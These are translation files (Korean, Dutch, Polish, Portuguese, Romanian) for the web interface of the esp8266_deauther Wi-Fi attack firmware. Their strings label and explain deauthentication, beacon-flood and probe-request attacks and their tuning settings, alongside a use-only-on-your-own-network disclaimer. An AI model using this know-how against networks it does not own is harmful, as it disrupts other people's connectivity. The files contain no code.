"ssids_info": "- 이 SSID 목록은 Beacon과 Probe 공격에 사용합니다.\n- 각 SSID는 최대 32자리 까지 가능합니다. 한국어는 신호가 약하거나 SSID가 적게 나올수도있습니다.\n- SSID를 편집할때 저장을 클릭하는 것을 잊지 마세요.\n- SSID를 복제하고 리로드를 해야합니다.\n",
"attack_info": "- 공격도중 연결이 Wi-Fi가 끊어질때도 있습니다!\n- Deauth 공격은 공격 대상을 지정해야합니다.\n- Beacon과 Probe 공격을 위해서는 SSID를 저장해야합니다.\n- 패킷 속도를 새로 볼려면 리로드를 클릭하세요.\n",
"settings_info": "- 일부 설정은 재부팅이 필요합니다.\n- 변경내용을 적용하실려면 저장을 클릭하세요.\n",
"info_disclaimer": "예기치 않은 오류가 생길경우 리로드를 하고 디버깅을 위해 모니터를 연결하세요. 모니터가 없을시 무시하세요.",
"start_stop": "실행 / 중지",
"start": "실행",
"stop": "중지",
"wifi_off": "와이파이 끄기",
"reboot": "재부팅",
"reset": "리셋",
"enable_random": "랜덤모드 활성화",
"disable_random": "랜덤모드 비활성화",
"random_desc": "랜덤모드 활성화시 설정하신 시간마다 SSID목록을 새로 생성합니다.",
"deauth_desc": "Deauth 공격은 선택한 AP에 클라이언트 장치에 인증 해제 프레임을 전송하여 Wi-Fi연결에 장애를 발생합니다.\n많은 장치가 공격에 대한 보호를 제공하는 802.11w-2009표준을 사용하지 않을 경우 사용이 가능합니다 요약하자면 대부분 Wi-Fi에서는 공격이 가능합니다.\n- 공격대상을 하나만 선택하세요! 다른 채널에서 실행되는 Wi-Fi를 선택하고 공격하면 채널간 빠르게 전환되며 웹 인터페이스에 다시 연결하기가 어렵습니다.\n",
"beacon_desc": "Beacon 공격은 Wi-Fi를 여러개 생성하여 Wi-Fi네트워크를 만든것처럼 보이는 공격기술입니다.\nSSID설정에서 Wi-Fi이름을 선택이 가능합니다.",
"probe_desc": "알려진 네트워크가 근처에 있는지 확인하기 위해 클라우드장치에서 Prob 요청을 보냅니다.\nSSID목록에 지정한 네트워크를 요청하여 Wi-Fi 추적기를 혼동하려면 이 공격방법을 사용하세요.\n이 공격이 가정집에 미치는 영향을 볼 가능성은 적습니다.",
"setting_version": "버전 번호 예시) v2.0.\n이 설정은 소스코드에서만 변경이 가능합니다.",
"setting_ssid" : "웹인터페이스에서 사용하는 SSID\nSSID는 1~31자 사이여야 합니다.",
"setting_password": "웹인터페이스에 사용되는 Wi-Fi 비밀번호를 설정이 가능합니다.\n8~31자리여야합니다",
"setting_channel": "웹인터페이스에 사용되는 Wi-Fi의 채널을 설정할 수 있습니다.",
"setting_hidden": "웹인터페이스 Wi-Fi를 숨길 수 있습니다.",
"setting_captivePortal": "캡티브 포털 활성화 여부를 선택할 수 있습니다.",
"setting_autosave": "SSID와 장치이름을 자동으로 저장합니다.",
"setting_autosavetime": "자동저장 시간간격 (밀리초 단위)",
"setting_display": "디스플레이 인터페이스 활성화 여부를 선택할 수 있습니다.",
"setting_displayTimeout": "비활성화 상태일때 디스플레이가 꺼지는 시간 (초단 위)\n디스플레이 꺼짐 시간을 비활성화 할려면 0으로 설정하세요.",
"setting_serial": "시리얼 인터페이스 활성화 여부를 선택 할 수 있습니다.\n비활성화를 추천드립니다.",
"setting_serialEcho": "시리얼을 통해 들어오는 각 메시지에 에코 활성화 여부를 선택 할 수 있습니다.",
"setting_web": "웹인터페이스 사용여부를 선택 할 수 있습니다.",
"setting_webSpiffs": "모든 웹파일 SPIFFS 사용",
"setting_led": "LED기능 활성화 여부를 선택 할 수 있습니다.",
"setting_maxch": "최대 검색 채널\n미국 = 11, 유럽 = 13, 일본 = 14.",
"setting_macAP": "웹인터페이스 Wi-Fi에 사용하는 MAC주소를 정해주세요.\nMAC주소 지정시 내부 MAC주소를 대체합니다. 주의해주세요.",
"setting_macSt": "스테이션모드에서 사용되는 MAC주소\n스테이션모드가 활성화된 경우 내부 MAC주소를 대체합니다. 주의해주세요.",
"setting_chtime": "채널 호핑이 활성화중일때, 다음 채널로 이동하기 전에 한 채널을 검색하기 위한 시간입니다 (밀리초 단위)",
"setting_minDeauths": "LED를 삭제 모드로 변경하기 위해 검색할때 최소 인증프레임 수입니다.",
"setting_attacktimeout": "공격도중 지정한 시간후 공격이 자동으로 멈춥니다 (초 단위)\n0으로 설정할시 비활성화됩니다.",
"setting_forcepackets": "패킷을 전송 시도 횟수\n사용량이 많은 지역에서 더 나은 패킷 비율을 얻으려면 이 값을 더 높게 설정해야합니다.\n이값을 변경시 장치가 느리거나 불안정해질수 있습니다. 주의하세요.\n최대값은 255입니다!",
"setting_deauthspertarget": "각 대상에 대해 발송되는 인증 및 연결 해제 프레임 수.",
"setting_deauthReason": "공격대상 장치에 연결이 끊어지는 이유를 알리기위해 Deauth 프레임과 함께 전송되는 이유 코드",
"setting_beaconchannel": "활성화되면 Beacon 공격을 실행할때 다른 채널의 모든 프레임을 보냅니다.",
"setting_beaconInterval": "true로 설정하면 Beacon이 매초마다 전송됩니다. false로 설정하면 간격은 100ms입니다.\n더 긴 간격은 더 많은 안정성과 적은 패킷공격을 의미하지만 클라이언트가 스캔할 때 SSID를 찾을 때까지 더 오래 시간이 걸릴 수 있습니다.",
"setting_randomTX": "Beacon또는 Probe 요청 프레임을 보내기 위해 무작위 전송 전력을 활성화합니다.",
"setting_probesPerSSID": "각 SSID에 대해 전송된 Probe 요청 프레임 수입니다.",
"setting_lang": "웹인터페이스 언어를 선택 할 수 있습니다.\n언어파일이 있는지 확인해주세요."
} |
|
esp8266_deauther-2/web_interface/lang/nl.lang | {
"lang": "nl",
"warning": "WAARSCHUWING",
"disclaimer": "Dit project is een proof of concept voor test- en educatieve doeleinden. \ nNoch de ESP8266, noch de SDK is bedoeld of gebouwd voor deze doeleinden. Er kunnen bugs optreden! \ n \ nGebruik het alleen voor uw eigen netwerken en apparaten ! \ n \ nHet maakt gebruik van geldige Wi-Fi-frames zoals beschreven in de IEEE 802.11-standaard en blokkeert of verstoort geen frequenties. \ nControleer de wettelijke voorschriften in uw land voordat u het gebruikt. \ n \ nRaadpleeg dit project niet als \ "jammer \", dat ondermijnt het werkelijke doel van dit project volledig! \ nAls je dat doet, bewijst het alleen dat je niets begreep van waar dit project voor staat. \ nPubliceren van inhoud hierover zonder een goede uitleg laat zien dat je het alleen doet voor de kliks, roem en / of geld en geen respect hebt voor intellectueel eigendom, de gemeenschap erachter en de strijd voor een betere wifi-standaard. \ n \ nVoor meer informatie bezoek:",
"disclaimer-button": "Ik heb de bovenstaande informatie gelezen en begrepen",
"reload": "Opnieuw laden",
"scan": "Scan",
"ssids": "SSIDs",
"attacks": "Aanvallen",
"settings": "Instellingen",
"info": "Info",
"info_span": "INFO: ",
"all": "Allemaal",
"channel": "Kanaal",
"devices": "Opgeslagen apparaten",
"select_all": "Alles selecteren",
"deselect_all": "Deselecteer alles",
"remove_all": "Verwijder alles",
"station_scan_time": "Station Scan Tijd",
"new": "Nieuw",
"save": "Opslaan",
"add": "Toevoegen",
"add_selected": "Geselecteerde AP's klonen",
"overwrite": "Overschrijven",
"time_interval": "Tijdsinterval",
"number": "Nummer",
"targets": "Doelen",
"scan_info": "-Klik op Scannen en wacht tot de blauwe LED op je bord uitgaat (of verandert in groen), klik dan op Opnieuw laden. \ n- De webinterface zal niet beschikbaar zijn tijdens een stationscan en je moet opnieuw verbinding maken ! \ n- Selecteer slechts één doel! \ n",
"ssids_info": "- Deze SSID-lijst wordt gebruikt voor de beacon- en sonde-aanval. \ n- Elke SSID kan maximaal 32 tekens lang zijn. \ n- Vergeet niet op opslaan te klikken wanneer u een SSID hebt gewijzigd. \ n- U moeten op Opnieuw laden klikken na het klonen van SSID's. \ n ",
"attack_info": "- U kunt de verbinding verliezen wanneer u een aanval start! \ n- U moet een doelwit selecteren voor de deauth-aanval. \ n- U hebt een opgeslagen SSID nodig voor de beacon- en sonde-aanval. \ n- Klik op herladen om vernieuw de pakketsnelheid. \ n ",
"settings_info": "- Sommige instellingen vereisen een herstart. \ n- Klik op opslaan om er zeker van te zijn dat uw wijzigingen worden toegepast. \ n",
"info_disclaimer": "In het geval van een onverwachte fout, graag de site opnieuw laden en naar de seriële monitor te kijken voor verdere fout opsporing.",
"start_stop": "START / STOP",
"start": "START",
"stop": "STOP",
"wifi_off": "WiFi Uit",
"reboot": "Herstart",
"reset": "Reset",
"enable_random": "Schakel willekeurige modus in",
"disable_random": "Schakel willekeurige modus uit",
"random_desc": "Schakel de willekeurige modus in om een willekeurige SSID-lijst met op interval te genereren.",
"deauth_desc": "Verbreekt de verbinding van WiFi-apparaten door deauthenticatieframes te verzenden naar toegangspunten en clientapparaten die u hebt geselecteerd. \ nDit is alleen mogelijk omdat veel apparaten de 802.11w-2009-standaard niet gebruiken die hiertegen bescherming biedt aanval. \ n- Selecteer slechts één doelwit! Als je meerdere doelen selecteert die op verschillende kanalen draaien en de aanval start, zal het snel schakelen tussen die kanalen en heb je geen kans om opnieuw verbinding te maken met de webinterface. \ n ",
"beacon_desc": "Beacon-pakketten worden gebruikt om toegangspunten te adverteren. Door continu beacon-pakketten te verzenden, zal het lijken alsof u nieuwe WiFi-netwerken hebt gemaakt. \ nU kunt de netwerknamen specificeren onder SSID's.",
"probe_desc": "Probe-verzoeken worden verzonden door clientapparaten om te vragen of er een bekend netwerk in de buurt is. \ nGebruik deze aanval om wifi-trackers te verwarren door te vragen naar netwerken die u hebt opgegeven in de SSID-lijst. \ nHet is onwaarschijnlijk dat u enige impact zult zien door deze aanval met uw thuisnetwerk. ",
"setting_version": "Versienummer, d.w.z. v2.0. \ nDeze instelling kan alleen in de source code worden gewijzigd.",
"setting_ssid" : "SSID van toegangspunt gebruikt voor de webinterface (indien ingeschakeld). \ nDe lengte moet tussen 1 en 31 tekens zijn.",
"setting_password": "Wachtwoord van toegangspunt gebruikt voor de webinterface (indien ingeschakeld). \ nDe lengte moet tussen 8 en 31 tekens zijn.",
"setting_channel": "Standaard WiFi-kanaal dat wordt gebruikt bij het starten.",
"setting_hidden": "Verbergt het toegangspunt dat wordt gebruikt voor de webinterface (indien ingeschakeld).",
"setting_captivePortal": "Schakelt captive portal in voor toegangspunt (indien ingeschakeld)",
"setting_autosave": "Maakt automatisch opslaan van SSID's, apparaatnamen en instellingen mogelijk.",
"setting_autosavetime": "Tijdsinterval voor automatisch opslaan in milliseconden.",
"setting_display": "Schakelt weergave-interface in.",
"setting_displayTimeout": "Tijd in seconden waarna het scherm wordt uitgeschakeld wanneer het inactief is. \ nOm de schermtime-out uit te schakelen, stelt u deze in op 0.",
"setting_serial": "Schakelt seriële interface in. \ nHet wordt aanbevolen om deze niet uit te schakelen!",
"setting_serialEcho": "Maakt echo mogelijk voor elk inkomend bericht via serieel.",
"setting_web": "Schakelt webinterface in.",
"setting_webSpiffs": "Schakelt SPIFFS in voor alle webbestanden.",
"setting_led": "Schakelt de (RGB) LED-functie in.",
"setting_maxch": "Max. kanaal om op te scannen. \ nUS = 11, EU = 13, Japan = 14.",
"setting_macAP": "MAC-adres gebruikt voor de toegangspuntmodus. \ nHoud er rekening mee dat het MAC-adres alleen het interne MAC-adres zal vervangen wanneer de toegangspuntmodus is ingeschakeld.",
"setting_macSt": "MAC-adres dat wordt gebruikt voor de stationmodus. \ nHoud er rekening mee dat het MAC-adres alleen het interne MAC-adres zal vervangen wanneer de stationmodus is ingeschakeld.
"setting_chtime": "Tijd voor het scannen van een kanaal alvorens naar het volgende te gaan in milliseconden (alleen als kanaalhoppen is ingeschakeld).",
"setting_minDeauths": "Minimum aantal deauthenticatieframes bij het scannen om de LED in de deauth-modus te veranderen.",
"setting_attacktimeout": "Na hoeveel tijd (in seconden) zal de aanval automatisch stoppen. \ nStel het in op 0 om het uit te schakelen.",
"setting_forcepackets": "Hoeveel pogingen om een pakket te verzenden. \ nStel deze waarde hoger in als je een betere pakketsnelheid wilt bereiken in een drukke omgeving. \ nWees voorzichtig dat deze instelling het apparaat langzamer of instabieler kan maken. \ nMax waarde is 255! ",
"setting_deauthspertarget": "Hoeveel deauthenticatie- en disassociatieframes worden verzonden voor elk doel.",
"setting_deauthReason": "De redencode die met de deauth-frames wordt verzonden om het doelapparaat te vertellen waarom de verbinding wordt verbroken.
"setting_beaconchannel": "Indien ingeschakeld, worden alle frames op verschillende kanalen verzonden wanneer een beacon-aanval wordt uitgevoerd.",
"setting_beaconInterval": "Indien ingesteld op true, worden beacons elke seconde verzonden. Indien ingesteld op false, is het interval 100 ms. \ nEen langer interval betekent meer stabiliteit en minder spamming van pakketten, maar het kan langer duren voordat de clients de ssids bij het scannen. ",
"setting_randomTX": "Maakt willekeurig zendvermogen mogelijk voor het verzenden van baken- en sonde-verzoekframes.",
"setting_probesPerSSID": "Hoeveel testverzoekframes worden verzonden voor elke SSID.",
"setting_lang": "Standaardtaal voor de webinterface. \ nZorg ervoor dat het taalbestand bestaat!"
} |
|
esp8266_deauther-2/web_interface/lang/pl.lang | {
"lang": "pl",
"warning": "OSTRZEŻENIE",
"disclaimer": "Ten projekt jest dowodem pomysłu który służy do celów testowych i edukacyjnych.\nAni ESP8266, ani jego SDK nie były przeznaczone i zbudowane do takich celów. Mogą występować błędy!\n\nUżywaj go tylko na swoich sieciach i urządzeniach!\n\nUżywa prawidłowych ramek Wi-Fi w standardzie IEEE 802.11 i nie blokuje ani nie zakłóca żadnych częstotliwości.\nSprawdź regulacje prawne w swoim kraju przed jego użyciem.\n\nProszę nie odnoś się do tego projektu jako \"jammer\", to całkowicie podważa prawdziwy cel tego projektu!\nJeśli to robisz, to tylko pokazuje że nie masz pojęcia po co powstał ten projekt.\nPublikowanie treści o tym bez prawidłowego wyjaśnienia oznacza że robisz to tylko dla kliknięć, sławy i/lub pieniędzy i nie masz szacunku dla własności intelektualnej, społeczności za tym stojącej i walki o lepszy standard WiFi.\n\nPo więcej informacji odwiedź:",
"disclaimer-button": "Przeczytałem i zrozumiałem powyższe informacje",
"reload": "Przeładuj",
"scan": "Skanowanie",
"ssids": "SSIDs",
"attacks": "Ataki",
"settings": "Ustawienia",
"info": "Informacje",
"info_span": "INFORMACJE: ",
"all": "Wszystkie",
"channel": "Kanał",
"devices": "Zapisane urządzenia",
"select_all": "Zaznacz wszystko",
"deselect_all": "Odznacz wszystko",
"remove_all": "Usuń wszystkio",
"station_scan_time": "Czas skanowania stacji",
"new": "Nowy",
"save": "Zapisz",
"add": "Dodaj",
"add_selected": "Sklonuj zaznaczone AP",
"overwrite": "Nadpisz",
"time_interval": "Przedział czasu",
"number": "Numer",
"scan_info": "- Kliknij Scan i poczekaj aż niebieski LED na płytce się wyłączy (lub zmieni kolor na zielony), wtedy kliknij Reload.\n- Interfejs sieciowy jest niedostępny podczas skanowania stacji, i będziesz musiał połączyć się ponownie!\n- Wybierz tylko jeden cel!\n",
"ssids_info": "- Ta lista SSID jest używana do ataków Beacon i Probe.\n- Każdy identyfikator SSID może mieć do 32 znaków.\n- Nie zapomnij kliknąć Save kiedy edytowałeś SSID.\n- Musisz kliknąć Reload po klonowaniu SSID.\n",
"attack_info": "- Możesz utracić połączenie podczas startowania ataku!\n- Musisz wybrać cel do ataku Deauth.\n- Potrzebujesz zapisanego SSID do ataków Beacon i Probe.\n- Kliknij Reload żeby odświeżyć szybkość pakietów.\n",
"settings_info": "- Niektóre ustawienia wymagają ponownego uruchomienia.\n- Kliknij Save aby upewnić się że twoje zmiany są zastosowane.\n",
"info_disclaimer": "W przypadku nieoczekiwanego błędu ponownie załaduj witrynę, i spójrz na monitor szeregowy w celu dalszego debugowania.",
"start_stop": "START / STOP",
"start": "START",
"stop": "STOP",
"wifi_off": "Wyłącz WiFi",
"reboot": "Uruchom ponownie",
"reset": "Resetuj",
"enable_random": "Włącz tryb losowy",
"disable_random": "Wyłącz tryb losowy",
"random_desc": "Włącz tryb losowy, aby wygenerować losowe identyfikatory SSID w określonym przedziale.",
"deauth_desc": "Zamyka połączenie urządzeń Wi-Fi, wysyłając ramki dezautoryzujące do wybranych punktów dostępu i ich klientów.\nJest to możliwe tylko dlatego, że wiele urządzeń nie korzysta ze standardu 802.11w-2009, który zapewnia ochronę przed tym atakiem.\n- Wybierz tylko jeden cel! Kiedy wybierzesz wiele celów, które działają na różnych kanałach i rozpoczniesz atak, szybko przełącza się między tymi kanałami i nie masz szans na ponowne połączenie się z interfejsem internetowym.\n",
"beacon_desc": "Pakiety beacon są używane do rozgłaszania punktów dostępu. Ciągłe wysyłanie pakietów beacon będzie wyglądać tak, jakbyś utworzył nowe sieci WiFi.\nMożesz określić nazwy sieci w zakładce SSID.",
"probe_desc": "Żądania sond są wysyłane przez klientów z pytaniem, czy w pobliżu znajduje się znana sieć. .\nUżyj tego ataku, aby zmylić elementy śledzące Wi-Fi, prosząc o sieci określone na liście SSID.\nPrawdopodobne nie zauważysz wpływu tego ataku na twoją domową sieć.",
"setting_version": "Numer wersji, np. v2.0.\nTo ustawienie może być zmienione tylko w kodzie źródłowym.",
"setting_ssid" : "SSID punktu dostępu używanego do tej strony (jeśli włączona).\nDługość musi być pomiędzy 1 a 31.",
"setting_password": "Hasło punktu dostępu używanego do tej strony (jeśli włączona).\nDługość musi być pomiędzy 8 a 31.",
"setting_channel": "Domyślna stacja WiFi używana na starcie.",
"setting_hidden": "Ukrywa punkt dostępu który jest używany do interfejsu sieciowego (jeśli włączony).",
"setting_captivePortal": "Włącza portal dostępowy dla punktu dostępu (jeśli jest włączony).",
"setting_autosave": "Włącza automatyczny zapis SSID, nazw urządzeń i ustawień.",
"setting_autosavetime": "Przedział czasu dla automatycznego zapisu w milisekundach.",
"setting_display": "Włącza interfejs wyświetlacza.",
"setting_displayTimeout": "Czas w sekundach po którym ekran zgaśnie jeśli jest nieaktywny.\nAby zablokować limit czasu wyświetlania, ustaw to na 0.",
"setting_serial": "Włącza interfejs szeregowy.\nLepiej tego nie wyłączać!",
"setting_serialEcho": "włącza echo dla każdej wiadomości przychodzącej przez łącze szeregowe.",
"setting_web": "Włącza interfejs sieciowy.",
"setting_webSpiffs": "Włącza SPIFFS dla wszystkich plików internetowych.",
"setting_led": "Włącza funkcje (RGB) LED.",
"setting_maxch": "Maksymalny kanał do skanowania.\nUS = 11, Europa = 13, Japonia = 14.",
"setting_macAP": "Adres MAC używany do punktu dostępu (AP).\nNależy pamiętać, że adres MAC zastąpi wewnętrzny adres MAC tylko wtedy, gdy włączony jest tryb punktu dostępu.",
"setting_macSt": "Adres MAC używany do trybiu stacji.\nNależy pamiętać, że adres MAC zastąpi wewnętrzny adres MAC tylko wtedy, gdy włączony jest tryb stacji.",
"setting_chtime": "Czas skanowania jednego kanału przed przejściem do następnego w milisekundach (tylko jeśli włączone jest przeskakiwanie kanałów).",
"setting_minDeauths": "Minimalna liczba ramek deautoryzacji podczas skanowania w celu zmiany diody LED w tryb deauth.",
"setting_attacktimeout": "Po jakim czasie (w sekundach) atak ma się zatrzymać.\nUstaw na 0 aby wyłączyć.",
"setting_forcepackets": "Ile prób wysłania pakietu.\nUstaw tę wartość wyższą, jeśli chcesz uzyskać lepszą szybkość pakietów w ruchliwym obszarze.\nOstrożnie, to ustawienie może spowodować że urządzenie będzie wolniejsze lub mniej stabilne.\nMaksymalna wartość to 255!",
"setting_deauthspertarget": "Ile ramek deautoryzacji i dysocjacji jest wysyłanych dla każdego celu.",
"setting_deauthReason": "Kod przyczyny wysyłany z ramkami deautoryzacji w celu poinformowania urządzenia docelowego, dlaczego połączenie zostanie zamknięte.",
"setting_beaconchannel": "Jeśli włączone, ramki będa wysyłane na różnych kanałach podczas ataku beacon.",
"setting_beaconInterval": "Jeśli ustawione na true, sygnały nawigacyjne będą wysyłane co sekundę. Jeśli ustawione na false, interwał będzie wynosił 100 ms.\nDłuższy interwał oznacza większą stabilność i mniej spamowania pakietów, ale może zająć więcej czasu, zanim klienci znajdą identyfikatory SSID podczas skanowania. ",
"setting_randomTX": "Włącza losową moc transmisji do wysyłania ramek beacon i sondujących.",
"setting_probesPerSSID": "Ile ramek żądań wysyłać dla każdego SSID.",
"setting_lang": "Język domyślny dla strony.\nUpewnij się że plik językowy istnieje!"
} |
|
esp8266_deauther-2/web_interface/lang/ptbr.lang | {
"lang": "pt-br",
"warning": "AVISO",
"disclaimer": "Este projeto é uma prova de conceito para fins educacionais e de teste.\nNem o ESP8266 nem seu SDK foram criados para esse propósito. Podem ocorrer erros!\n\nUtilize somente contra suas próprias redes e dispositivos!\n\nO software utiliza quadros Wi-Fi válidos descritos no padrão IEEE 802.11 e não bloqueia nem interrompe nenhuma frequência.\nPor favor, verifique os regulamentos legais em seu país antes de usá-lo.\n\nPor favor, não se refira a este projeto como \"jammer\", isso estraga totalmente o real objetivo deste projeto!\nSe você faz isso, prova apenas que não entendeu nada do que este projeto representa.\nPublicar conteúdo sobre isso sem uma explicação adequada mostra que você só o faz pelos cliques, fama e/ou dinheiro e não tem respeito pela propriedade intelectual, pela comunidade por trás dele e pela luta por um melhor padrão de WiFi.\n\nPara mais informações, visite:",
"disclaimer-button": "Eu li e entendi o aviso acima",
"reload": "Recarregar",
"scan": "Escanear",
"ssids": "SSIDs",
"attacks": "Ataques",
"settings": "Configurações",
"info": "Informações",
"info_span": "INFORMAÇÕES: ",
"all": "TUDO",
"channel": "Canal",
"devices": "Dispositivos salvos",
"select_all": "Selecionar todos",
"deselect_all": "Desselecionar todos",
"remove_all": "Remover todos",
"station_scan_time": "Tempo de escaneamento da estação",
"new": "Novo",
"save": "Salvar",
"add": "Adicionar",
"add_selected": "Clonar os APs selecionados",
"overwrite": "Substituir",
"time_interval": "Intervalo de tempo",
"number": "Número",
"targets": "Metas",
"scan_info": "- Clique em escanear e aguarde até que o LED azul na sua placa apague (ou mude para verde) e clique em Recarregar.\n- A interface Web não estará disponível durante o escaneamento de estação e você precisará reconectar!\n- Selecione apenas um alvo!\n",
"ssids_info": "- Esta lista de SSID é usada para ataques de \"Beacon\" e \"Probe\".\n- Cada SSID pode ter até 32 caracteres.\n- Não se esqueça de clicar em Salvar ao editar um SSID.\n- É necessário clicar em Recarregar após a clonagem dos SSIDs.\n",
"attack_info": "- Você pode perder a conexão ao iniciar um ataque!\n- Você precisa selecionar um alvo para o ataque \"Deauth\".\n- Você precisa de um SSID salvo para o ataque de \"Beacon\" e \"Probe\".\n- Clique em Recarregar para atualizar a taxa de pacotes.\n",
"settings_info": "- Algumas configurações exigem uma reinicialização.\n- Clique em Salvar para garantir que suas alterações sejam aplicadas.\n",
"info_disclaimer": "Em caso de erro inesperado, recarregue o site e consulte o monitor serial para obter mais informações de depuração.",
"start_stop": "INICIAR / PARAR",
"start": "INICIAR",
"stop": "PARAR",
"wifi_off": "WiFi desligado",
"reboot": "Reiniciar",
"reset": "Resetar",
"enable_random": "Habilitar modo aleatório",
"disable_random": "Desabilitar modo aleatório",
"random_desc": "Ative o modo aleatório para gerar uma lista SSID aleatória em um determinado intervalo.",
"deauth_desc": "Fecha a conexão de dispositivos WiFi enviando frames de desautenticação para pontos de acesso e dispositivos clientes selecionados.\nIsso é possível porque muitos dispositivos não usam o padrão 802.11w-2009 que oferece proteção contra esse ataque.\n- Por favor, selecione apenas um alvo! Quando você seleciona vários destinos executados em canais diferentes e inicia o ataque, o software alternará rapidamente entre esses canais e você não terá chance de se reconectar à interface Web.\n",
"beacon_desc": "Pacotes \"Beacon\" são usados para anunciar pontos de acesso. Ao enviar continuamente pacotes \"Beacon\", parece que você criou novas redes WiFi.\nVocê pode especificar os nomes de rede através dos SSIDs.",
"probe_desc": "As requisições do tipo \"Probe\" são enviadas pelos dispositivos clientes para perguntar se uma rede conhecida está próxima.\nUtilize esse ataque para confundir os rastreadores de WiFi solicitando as redes especificadas na lista SSID.\nÉ improvável que você veja qualquer impacto desse ataque na sua rede doméstica.",
"setting_version": "Número da versão, por exemplo v2.0.\nEsta configuração só pode ser alterada no código-fonte.",
"setting_ssid" : "SSID do ponto de acesso usado para a interface Web (se ativado).\nDeve ter entre 1 e 31 caracteres.",
"setting_password": "Senha do ponto de acesso usado para a interface Web (se ativada).\nDeve ter entre 8 e 31 caracteres.",
"setting_channel": "Canal WiFi padrão usado ao iniciar.",
"setting_hidden": "Oculta o ponto de acesso usado para a interface Web (se ativado).",
"setting_captivePortal": "Habilita o portal cativo para o ponto de acesso (se ativado).",
"setting_autosave": "Habilita o salvamento automático de SSIDs, nomes de dispositivos e configurações.",
"setting_autosavetime": "Intervalo de tempo, em milissegundos, para salvamento automático.",
"setting_display": "Habilita a interface de exibição.",
"setting_displayTimeout": "Tempo, em segundos, em que a tela é desativada após inatividade.\nPara desativar o tempo limite da tela, defina-o como 0.",
"setting_serial": "Habilita a interface serial.\nRecomenda-se não desabilitá-la!",
"setting_serialEcho": "Habilita a exibição de cada mensagem recebida pela interface serial.",
"setting_web": "Habilita a interface web.",
"setting_webSpiffs": "Habilita o SPIFFS para todos os arquivos da web.",
"setting_led": "Habilita o recurso de LED (RGB).",
"setting_maxch": "Número máximo de canais para o escaneamento.\nEUA = 11, EU = 13, Japão = 14 Brasil = 11.",
"setting_macAP": "Endereço MAC usado para o modo de ponto de acesso.\nObserve que o endereço MAC somente substituirá o endereço MAC interno quando o modo de ponto de acesso estiver ativado.",
"setting_macSt": "Endereço MAC usado para o modo de estação.\nObserve que o endereço MAC somente substituirá o endereço MAC interno quando o modo de estação estiver ativado.",
"setting_chtime": "Tempo, em milissegundos, para escanear um canal antes de ir para o próximo (apenas se o salto de canais estiver habilitado).",
"setting_minDeauths": "Número mínimo de frames de desautenticação durante o escaneamento para alterar o LED para o modo \"Deauth\".",
"setting_attacktimeout": "Após quanto tempo (em segundos) o ataque será interrompido automaticamente.\nDefina como 0 para desativá-lo.",
"setting_forcepackets": "Quantas tentativas de enviar um pacote.\nDefina esse valor mais alto se você deseja obter uma melhor taxa de pacotes em uma área ocupada.\nCuidado, essa configuração pode tornar o dispositivo mais lento ou mais instável.\nO valor máximo é 255!",
"setting_deauthspertarget": "Quantos quadros de desautenticação e desassociação são enviados para cada destino.",
"setting_deauthReason": "O código de razão enviado com os frames do tipo \"Deauth\" para informar ao dispositivo de destino por que a conexão será fechada.",
"setting_beaconchannel": "Se ativado, enviará todos os frames em canais diferentes ao executar um ataque do tipo \"Beacon\".",
"setting_beaconInterval": "Se definido como verdadeiro, os \"Beacon\" serão enviados a cada segundo. Se definido como falso, o intervalo será de 100 ms.\nUm intervalo maior significa mais estabilidade e menos spam de pacotes, mas pode levar mais tempo até que os clientes encontrem os SSIDs durante o escaneamento.",
"setting_randomTX": "Permite força aleatória de transmissão para enviar frames de requisições dos tipos \"Beacon\" e \"Probe\".",
"setting_probesPerSSID": "Quantidade de frames de requisições \"Probe\" enviados para cada SSID.",
"setting_lang": "Idioma padrão para a interface da Web.\nVerifique se o arquivo de idioma existe!"
} |
|
esp8266_deauther-2/web_interface/lang/ro.lang | {
"lang": "ro",
"warning": "ATENȚIE",
"disclaimer": "Acest proiect este o dovadă a conceptului de testare și scopuri educaționale.\nESP8266 si SDK-ul nu au fost create pentru astfel de scopuri. Pot apărea bug-uri!\n\nUtilizați-l numai pe propriile rețele și dispozitive!\n\nAcest soft foloseste cadre valide Wifi descrise în standartul IEEE 802.11 și nu blochează sau întrerupe nici o frecvență.\nVerificați reglementările legale din țara dvs. înainte de a le utiliza.\n\nNu vă referiți la acest proiect ca o \"statie de brutaj\", acesta descridită complet scopul real al acestui proiect!\nDacă o faci,aceasta dovedește doar că nu ați înțeles nimic despre din ceea ce reprezintă acest proiect..\nPublicarea conținutului despre aceasta fără o explicație adecvată arată că o faceți doar pentru clicuri, faimă și / sau bani și că nu aveți respect pentru proprietatea intelectuală, comunitatea din spatele ei și lupta pentru un standard WiFi mai bun.\n\nPentru mai multe informații vizitați:",
"disclaimer-button": "Am citit și am înțeles nota de mai sus",
"reload": "Reîncarcă",
"scan": "Scanați",
"ssids": "SSID-uri",
"attacks": "Atacuri",
"settings": "Setări",
"info": "Info",
"info_span": "INFO: ",
"all": "Toate",
"channel": "Canal",
"devices": "Dispozitive salvate",
"select_all": "Selectează tot",
"deselect_all": "Deselectați tot",
"remove_all": "Inlătură tot",
"station_scan_time": "Timp de scanare a stației",
"new": "Nou",
"save": "Salvați",
"add": "Adăuga",
"add_selected": "Clonează AP-urile selectate",
"overwrite": "Suprascriere",
"time_interval": "Interval de timp",
"number": "Număr",
"targets": "Țintă",
"scan_info": "- Faceți clic pe Scanare și așteptați până când LED-ul albastru de pe tablă se oprește (sau se schimbă în verde), apoi faceți clic pe Reîncărcare.\n- Interfața web nu va fi disponibilă în timpul scanării unui post și va trebui să vă reconectați!\n- Selectați doar o singură țintă!\n",
"ssids_info": "- Această listă SSID este utilizată pentru atacul sondei și sondei.\n- Fiecare SSID poate avea până la 32 de caractere.\n- Nu uitați să faceți clic pe Salvați când ați editat un SSID.\n- Trebuie să faceți clic pe Reîncărcați după clonarea SSID-urilor.\n",
"attack_info": "- S-ar putea să pierdeți conexiunea când începeți un atac!\n- Trebuie să selectați o țintă pentru atacul deauth.\n- Aveți nevoie de un SSID salvat pentru atacul sondei și sondei.\n- Faceți clic pe reîncărcați pentru a actualiza rata de pachete.\n",
"settings_info": "- Unele setări necesită repornire.\n- Faceți clic pe Salvați pentru a vă asigura că modificările sunt aplicate.\n",
"info_disclaimer": "În cazul unei erori neașteptate, reîncărcați site-ul și examinați monitorul serial pentru o depanare ulterioară.",
"start_stop": "START / STOP",
"start": "START",
"stop": "STOP",
"wifi_off": "Stingeti wifi-ul",
"reboot": "Reporniți",
"reset": "Restabili",
"enable_random": "Activați modul aleatoriu",
"disable_random": "Dezactivați modul aleatoriu",
"random_desc": "Activați modul aleatoriu pentru a genera o listă aleatorie SSID într-un interval dat.",
